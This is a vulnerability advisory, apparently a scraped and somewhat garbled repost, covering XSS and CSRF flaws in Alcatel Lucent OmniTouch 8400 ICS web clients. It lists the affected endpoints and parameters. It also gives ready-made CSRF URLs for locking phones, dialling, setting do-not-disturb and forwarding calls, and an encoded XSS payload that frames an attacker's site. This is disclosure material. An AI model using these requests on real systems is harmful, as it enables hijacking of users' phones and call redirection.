Affected products:
Alcatel Lucent OmniTouch 8400 Instant Communications
Suite (ICS) Version 6.1 Patch 102a
(Older releases have not been tested)
Summary:
Alcatel Lucent's ICS offers Unified Communication services
Over several access ways, like handhelds and web-clients.
The web-client WebICS offers end users services like access
To personal and global address books, initiate CILS, call
Redirects etc.
Several common flaws cocould be found in WebICS like reflected
And stored XSS as well as CSRF. In Webadmin reflected XSS
Cocould be found.
Possible Effects:
One cocould use a stored XSS in the phonebook and change
End users phone configuration like DND or call redirect.
Vulnerable Scripts WebICS:
CSRF
-/Websoftphone/servlet/DispPhoneSet
-/Websoftphone/servlet/DispRTC
-/Websoftphone/servlet/DispPhoneSet
Stored XSS:
-All Input-Fields of the phonebook
Reflected XSS:
-/Websoftphone/jsp/CBCallBackCont. jsp, parameter list
-/Websoftphone/jsp/PhoneBookCont. jsp, parameter udatab
-/Websoftphone/jsp/CustoData. jsp, parameter openwin
-/Websoftphone/jsp/RTCNavigator. jsp, parameter sessionid
-/Websoftphone/servlet/DispLogon, parameter next
-/Websoftphone/servlet/DispLogon, parameter main
Vulnerable Scripts WebAdmin:
Reflected XSS:
-/ClientMgmt, parameter action
CSRF example:
-Lock a phone
Https://www.2cto.com/websoftphone/servlet/DispPhoneSet? Method = setLock
-Dial
Https://www.2cto.com/websoftphone/servlet/DispRTC? Method = makeCall & number = XXXX
-Set DND
Https://www.2cto.com/websoftphone/servlet/DispPhoneSet? Method = setDoNotDisturb
-Set call forward
Https://www.2cto.com/websoftphone/servlet/DispPhoneSet? Method = setForward & type = immediate & FwdTarget = onSomeone & number = xxxx
Https://www.2cto.com/websoftphone/jsp/CBCallBackCont. jsp? List = % 22% 3E % 3 CFRAME % 20SRC = % 22 http://www.boeserangreifer.de % 22% 3E % 3C & rand = 0
Solution
Install official patches